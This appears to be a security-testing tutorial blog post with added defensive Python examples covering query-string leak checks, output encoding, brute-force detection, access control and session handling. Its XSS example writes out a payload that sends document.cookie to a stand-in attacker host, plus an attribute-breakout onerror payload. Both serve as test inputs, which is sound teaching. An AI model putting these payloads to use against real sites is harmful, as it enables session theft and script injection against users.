Importance Of Security Testing


Nowadays most of our data lives in the cloud. Sensitive personal information such as bank details, emails, passwords and credit card numbers is stored on some server and managed in a particular database. But attackers regularly show how vulnerable much of that online data is. Data leaks happen every day, across the world.

A data leak harms both the organization and its clients, so organizations try to build the best security they can into their applications and websites. Major companies like Google and Apple also offer large cash rewards (bug bounties) to anyone who identifies security vulnerabilities in their websites and software products.


The primary goal of security testing is to identify and assess how vulnerable a system may be, and to determine whether its data and resources are protected from potential attackers.


Security testing today has expanded into several distinct types:


►Vulnerability Scanning

►Security Scanning

►Penetration testing

►Risk Assessment

►Security Auditing

►Posture Assessment

►Ethical hacking



Each of these is important in its own way, and many organizations that offer security services include all of them. In detail:


Vulnerability Scanning: uses automated tools to inspect systems and application software for known security weaknesses and flaws, typically by comparing software versions and configurations against a database of known vulnerabilities.


Security Scanning: identifies network and system weaknesses and then proposes solutions for reducing those risks. Both manual techniques and automated tools are used in this type of test.


Penetration testing: simulates an attack by a malicious hacker. It involves analysing a particular system to find the vulnerabilities that an external attacker could actually exploit.


Risk Assessment: analyses the security risks observed in the organization and recommends controls and measures to reduce them. Risks are classified as Low, Medium or High.


Security Auditing: an internal inspection of applications and operating systems for security flaws, typically a line-by-line review of code and configuration.


Ethical hacking: attacking an organization's software systems with its permission. Unlike malicious hackers, who steal for their own gain, the intent is to expose security flaws in the system so that they can be fixed.


Posture Assessment: combines ethical hacking, security scanning and risk assessment to show the overall security posture of an organization.


Some key terms used in security testing:


♦Vulnerability: a weakness in the web application that an attacker can exploit.

♦URL Manipulation: it is easy to edit a URL in the browser. If the application trusts whatever arrives in the URL, users can be redirected and confidential data can be leaked. It is therefore important for the tester to check whether the application passes sensitive data through its URL string.

Testers check whether the application allows sensitive data in the query string. These attacks are possible when the application uses the HTTP GET method to exchange information between the client and the server, because query strings end up in browser history, proxy and server logs, and Referer headers.
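As an added example (not part of the original post), here is a small Python checker for this test. The list of sensitive parameter names, the value patterns and the sample URLs are constructed for illustration and would be tuned to the application under test:

```python
# Added example (not from the original post): a small checker for the test
# described above, flagging sensitive data carried in URL query strings.
# The parameter-name list, the value patterns and the sample URLs are
# constructed for illustration and should be tuned to the application under test.
import re
from urllib.parse import parse_qsl, urlparse

# Parameter names that should never appear in a GET query string (assumption).
SENSITIVE_NAMES = {"password", "passwd", "pwd", "token", "session", "sessionid",
                   "card", "cardnumber", "cvv", "ssn", "secret", "apikey"}

CARD_RE = re.compile(r"^\d{13,19}$")              # bare payment card number
HEX_TOKEN_RE = re.compile(r"^[0-9a-fA-F]{32,}$")  # long hex string: session id / API key


def luhn_ok(digits: str) -> bool:
    """Luhn checksum, so that not every long number is reported as a card."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_sensitive_query_params(url: str) -> list:
    """Return (name, reason) for each query parameter that leaks sensitive data."""
    findings = []
    for name, value in parse_qsl(urlparse(url).query, keep_blank_values=True):
        normalised = name.lower().replace("-", "").replace("_", "")
        if normalised in SENSITIVE_NAMES:
            findings.append((name, "sensitive parameter name"))
        elif CARD_RE.match(value) and luhn_ok(value):
            findings.append((name, "value looks like a payment card number"))
        elif HEX_TOKEN_RE.match(value):
            findings.append((name, "value looks like a session or API token"))
    return findings


def audit(urls) -> dict:
    """Map each URL to its findings; an empty list means the query string looked clean."""
    return {url: find_sensitive_query_params(url) for url in urls}


# Constructed sample URLs, as a tester might collect them from a proxy log.
SAMPLE_URLS = [
    "https://app.example/search?q=shoes&page=2",
    "https://app.example/login?user=alice&password=hunter2",
    "https://shop.example/pay?pan=4111111111111111&amount=10",
    "https://app.example/profile?sid=" + "deadbeef" * 4,
]

if __name__ == "__main__":
    for url, findings in audit(SAMPLE_URLS).items():
        print(url, "->", findings or "clean")
```

Feed it the URLs captured by an intercepting proxy during a test session; anything it flags should be moved to a POST body (or, for tokens, to a cookie or header) rather than left in the query string.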

♦SQL Injection: one of the most common and dangerous vulnerabilities. It can give an attacker direct access to the database: SQL fragments are inserted through the web application's user interface into a query that the server then executes.

Testers check each input that reaches the database to see whether it can be exploited by a SQL injection attack. They identify and test the code paths where SQL queries are built directly from user input, and verify that the application uses parameterized queries instead of string concatenation.

♦Cross-site scripting (XSS): a client-side injection attack in which the attacker aims to execute malicious scripts in the victim's browser. These scripts can perform a variety of functions, such as sending the victim's login credentials or session token to the attacker, logging their keystrokes, or performing arbitrary actions on behalf of the victim.

Testers must confirm that the application does not trust unvalidated user input, and that it properly encodes the output of these fields (HTML-escaping at minimum, matched to the context in which the value is placed) wherever they are included in a server response.
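An added example (not from the original post) showing the same user input rendered with and without output encoding, plus a small parser-based check a tester can run over a response to see whether injected markup survived. The templates, payloads and the allowed-tag list are constructed for illustration:

```python
# Added example (not from the original post): rendering a user-supplied comment
# into HTML with and without output encoding, plus a small parser-based check a
# tester can run on the response to see whether injected markup survived.
# Payloads and templates are constructed for illustration.
import html
from html.parser import HTMLParser


def render_unsafe(comment: str) -> str:
    """Vulnerable: untrusted text is concatenated straight into markup."""
    return f'<p class="comment">{comment}</p>'


def render_safe(comment: str) -> str:
    """Safe for an HTML text context: &, <, >, " and ' are encoded."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def render_attr_unsafe(value: str) -> str:
    """Vulnerable: a quote in the value breaks out of the attribute."""
    return f'<input name="q" value="{value}">'


def render_attr_safe(value: str) -> str:
    """Safe for a quoted attribute context: same encoding, value kept quoted."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records every start tag and any event-handler or javascript: attribute."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.active_attrs = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, value in attrs:
            if name.startswith("on") or (value or "").strip().lower().startswith("javascript:"):
                self.active_attrs.append((tag, name))


def xss_survives(rendered: str, allowed_tags=("p", "input")) -> bool:
    """True if the browser would see a tag or handler the template did not put there."""
    parser = _TagCollector()
    parser.feed(rendered)
    parser.close()
    return any(tag not in allowed_tags for tag in parser.tags) or bool(parser.active_attrs)


if __name__ == "__main__":
    for payload, unsafe, safe in [
        ("<script>fetch('https://evil.example/?c=' + document.cookie)</script>", render_unsafe, render_safe),
        ('"><img src=x onerror=alert(1)>', render_attr_unsafe, render_attr_safe),
    ]:
        print("unsafe:", xss_survives(unsafe(payload)), "| safe:", xss_survives(safe(payload)))
```

The second payload matters: it contains no `<script>` tag at all, yet in the unencoded attribute it breaks out of the quotes and adds an `onerror` handler, which is why the check looks at event attributes and not only at tag names.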

♦Brute-force Attack: brute-force attacks rely on trying many candidate values for a targeted password until the correct one is found. Attackers use them to obtain personal identification numbers, passphrases, passwords or usernames in order to carry out identity theft, redirect domains to sites hosting malicious content, or other malicious activity. Testers check that the application throttles or locks out repeated failed login attempts, and that failed attempts are logged so they can be detected.
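An added example (not from the original post) of the detection side of this check: a small scan over authentication logs that flags a source hammering one account and a source spraying one guess across many accounts. The log format, the thresholds and the log lines are constructed for illustration (the addresses come from the RFC 5737 documentation ranges):

```python
# Added example (not from the original post): spotting brute-force and
# password-spraying behaviour in authentication logs. The log format, the
# thresholds and the log lines are constructed for illustration; the source
# addresses are from the documentation ranges (RFC 5737).
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) LOGIN_(?P<result>OK|FAIL) ip=(?P<ip>\S+) user=(?P<user>\S+)$")


def parse_line(line: str):
    """Parse one constructed log line; returns None for lines in another format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "result": m["result"], "ip": m["ip"], "user": m["user"]}


def detect_bruteforce(lines, threshold: int = 5, window: timedelta = timedelta(minutes=1)) -> list:
    """Return one alert (ip, kind, failures) per source that reaches `threshold`
    failed logins inside a sliding `window`. kind is 'password_spray' when the
    failures are spread over at least `threshold` distinct accounts, otherwise
    'credential_bruteforce' (hammering one or a few accounts)."""
    recent = defaultdict(deque)   # ip -> deque of (timestamp, user) failures in window
    alerts, seen = [], set()
    for line in lines:
        event = parse_line(line)
        if event is None or event["result"] != "FAIL":
            continue
        q = recent[event["ip"]]
        q.append((event["ts"], event["user"]))
        while q and event["ts"] - q[0][0] > window:   # drop failures outside the window
            q.popleft()
        if len(q) >= threshold:
            users = {user for _, user in q}
            kind = "password_spray" if len(users) >= threshold else "credential_bruteforce"
            if (event["ip"], kind) not in seen:
                seen.add((event["ip"], kind))
                alerts.append((event["ip"], kind, len(q)))
    return alerts


# Constructed sample log: one legitimate user who mistypes once, one attacker
# hammering a single account, one attacker trying one password per account.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z LOGIN_FAIL ip=198.51.100.7 user=frank
2024-05-01T10:00:05Z LOGIN_OK ip=198.51.100.7 user=frank
2024-05-01T10:00:10Z LOGIN_FAIL ip=203.0.113.5 user=alice
2024-05-01T10:00:11Z LOGIN_FAIL ip=203.0.113.5 user=alice
2024-05-01T10:00:12Z LOGIN_FAIL ip=203.0.113.5 user=alice
2024-05-01T10:00:13Z LOGIN_FAIL ip=203.0.113.5 user=alice
2024-05-01T10:00:14Z LOGIN_FAIL ip=203.0.113.5 user=alice
2024-05-01T10:00:15Z LOGIN_FAIL ip=203.0.113.5 user=alice
2024-05-01T10:01:00Z LOGIN_FAIL ip=203.0.113.9 user=alice
2024-05-01T10:01:01Z LOGIN_FAIL ip=203.0.113.9 user=bob
2024-05-01T10:01:02Z LOGIN_FAIL ip=203.0.113.9 user=carol
2024-05-01T10:01:03Z LOGIN_FAIL ip=203.0.113.9 user=dave
2024-05-01T10:01:04Z LOGIN_FAIL ip=203.0.113.9 user=erin
"""

if __name__ == "__main__":
    for ip, kind, count in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{ip}: {kind} ({count} failures in window)")
```

A per-account lockout alone would miss the second attacker, who never fails the same account more than once; that is why the detector also counts distinct usernames per source.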

♦Monitor access control management: in a web application or on a computer, access control is a complex area that protects the application or system from being exploited by attackers or insider threats.

It has two parts:

•Authentication – who are you? (verify the user's identity)

•Authorization – what are you allowed to do? (decide the user's permissions)
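An added example (not from the original post) with the two halves side by side: authenticate() verifies identity against a salted PBKDF2 hash, and authorize() decides permissions with a role check plus a per-object ownership check, so a user who edits an id in a request still cannot read someone else's document. The users, roles, documents and iteration count are constructed for the demo:

```python
# Added example (not from the original post): the two halves of access control
# side by side. authenticate() answers "who are you?" by checking a salted
# PBKDF2 password hash; authorize() answers "what may you do?" with a role check
# plus an ownership check per object. Users, roles and documents are constructed.
import hashlib
import hmac
import os

PBKDF2_ROUNDS = 100_000   # assumption for the demo; tune upward in production


def hash_password(password: str, salt: bytes = None) -> tuple:
    """Return (salt, digest); a fresh random salt is generated when none is given."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt, digest


def build_users() -> dict:
    """Constructed user store: username -> salt, digest, role."""
    users = {}
    for name, password, role in [("alice", "correct horse", "user"),
                                 ("bob", "battery staple", "user"),
                                 ("root", "admin-pass", "admin")]:
        salt, digest = hash_password(password)
        users[name] = {"salt": salt, "digest": digest, "role": role}
    return users


USERS = build_users()
DOCS = {101: "alice", 102: "bob"}   # constructed: document id -> owner
_DUMMY_SALT = b"\x00" * 16


def authenticate(users: dict, username: str, password: str):
    """Who are you? Returns a principal dict on success, None otherwise."""
    record = users.get(username)
    if record is None:
        hash_password(password, _DUMMY_SALT)   # same cost for unknown users, so timing does not reveal valid names
        return None
    _, digest = hash_password(password, record["salt"])
    if not hmac.compare_digest(digest, record["digest"]):
        return None
    return {"username": username, "role": record["role"]}


def authorize(principal, action: str, doc_id: int) -> bool:
    """What are you allowed to do? Deny by default; admins may act on any
    document, ordinary users only read or write documents they own."""
    if principal is None or doc_id not in DOCS:
        return False
    if principal["role"] == "admin":
        return True
    return action in ("read", "write") and DOCS[doc_id] == principal["username"]


if __name__ == "__main__":
    alice = authenticate(USERS, "alice", "correct horse")
    print("alice reads 101:", authorize(alice, "read", 101))   # her own document
    print("alice reads 102:", authorize(alice, "read", 102))   # bob's document
```

The test a reviewer runs against real code is the second print: log in as one user, change the object id in the request to another user's, and confirm the server refuses. Authentication succeeding is never enough on its own.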


♦Check server access control: web applications have multiple entry points that provide enough access to complete users' requests, but each of them must stay secured to prevent data breaches or attacks.

Testers should ensure that all internal-network entry points to the application are reachable only by the expected machines (IPs), applications and users, and that all access is strictly controlled. To check whether an open entry point is sufficiently restricted, QA should try to reach it from several machines with both trusted and untrusted IP addresses.

Moreover, a variety of real-time transactions should be performed in bulk to check the application's behaviour under load.

While doing security testing, the tester should also check that the open entry points in the application permit the specific actions users perform only in a secure way.

♦Session management: to ensure that your application has appropriate session management, check that the session expires after a particular idle time, that a fresh session identifier is issued on login and the session is terminated on logout, that the session ends after a maximum lifetime regardless of activity, and that the session cookie's scope and attributes (Secure, HttpOnly, SameSite) are set correctly.
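An added example (not from the original post) of a session store that enforces these checks: an idle timeout, an absolute lifetime, a fresh identifier on every login, server-side invalidation on logout, and the cookie attributes to look for on Set-Cookie. The timeout values are assumptions, and the clock is injected so the expiry paths can be exercised without waiting:

```python
# Added example (not from the original post): a session store that enforces the
# checks listed above: idle timeout, absolute lifetime, a fresh identifier on
# login and invalidation on logout, plus the cookie attributes a tester looks
# for. The timeouts are assumptions; time is injected so the behaviour can be
# exercised without waiting.
import secrets
import time
from dataclasses import dataclass

IDLE_TIMEOUT = 15 * 60       # seconds without a request before the session dies
MAX_LIFETIME = 8 * 60 * 60   # seconds after login, regardless of activity


@dataclass
class Session:
    user: str
    created: float
    last_seen: float


class SessionStore:
    def __init__(self, clock=time.time):
        self._clock = clock        # callable returning seconds
        self._sessions = {}

    def login(self, user: str, old_sid: str = None) -> str:
        """Issue a brand-new id on every login; any pre-login session id the
        client presented is discarded (defeats session fixation)."""
        if old_sid is not None:
            self._sessions.pop(old_sid, None)
        sid = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
        now = self._clock()
        self._sessions[sid] = Session(user, now, now)
        return sid

    def touch(self, sid: str):
        """Validate a presented id: returns the user, or None once the idle or
        absolute limit has passed (the dead session is removed)."""
        session = self._sessions.get(sid)
        if session is None:
            return None
        now = self._clock()
        if now - session.last_seen > IDLE_TIMEOUT or now - session.created > MAX_LIFETIME:
            del self._sessions[sid]
            return None
        session.last_seen = now
        return session.user

    def logout(self, sid: str) -> bool:
        """Server-side termination; returns False if the id was not live."""
        return self._sessions.pop(sid, None) is not None

    def active(self) -> int:
        return len(self._sessions)


def session_cookie(sid: str) -> str:
    """Set-Cookie value to check for: host-only (no Domain attribute), Secure,
    HttpOnly and SameSite, so the cookie is neither readable by script nor sent
    over plain HTTP."""
    return f"sid={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


class FakeClock:
    """Controllable clock for exercising the timeouts."""

    def __init__(self, start: float = 1_700_000_000.0):
        self.now = start

    def __call__(self) -> float:
        return self.now

    def advance(self, seconds: float) -> None:
        self.now += seconds


if __name__ == "__main__":
    clock = FakeClock()
    store = SessionStore(clock)
    sid = store.login("alice")
    clock.advance(IDLE_TIMEOUT + 1)
    print("after idle timeout:", store.touch(sid))   # None
```

Against a real application the same checks are black-box: log in, note the cookie, wait past the idle limit (or keep clicking past the absolute limit) and confirm the old cookie is refused; log out and confirm the old cookie is refused even though the browser still has it.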


Checklist to consider when performing web application security testing:

1. Asset discovery

2. Check for outdated versions

3. Check permissions

4. Check Security protocols

5. Analyse code robustness with a penetration test

6. Test database security

7. Check network assets

8. Run configuration tools

9. Client-side logic

10. Business logic

11. Input validation

12. Authentication and session management

13. Configuration

14. Check authorization

15. Test error handling


Checklist to consider when performing Mobile application security testing.


1. Nature of the app

2. Check that the application code is hardened against reverse engineering and tampering

3. Avoid unnecessary user permissions

4. Check background data usage while the app is running

5. Check battery usage while the application is running, and check that the device does not overheat while it runs

6. Check that data in transit is protected (TLS)

7. Check for hidden activity, ensuring the application does not access the user's private files

8. Check that the application does not hand payment data to an untrusted third-party payment gateway

9. Check for hidden loopholes in the app


Benefits of security testing


•Higher return on investment
•Secure third-party APIs and services
•Eliminate the impact of trojanized apps
•Prevent data leaks
•Implement corporate policy
•Secure the application code
•Eliminate common security vulnerabilities
•Prevent real-time security attacks







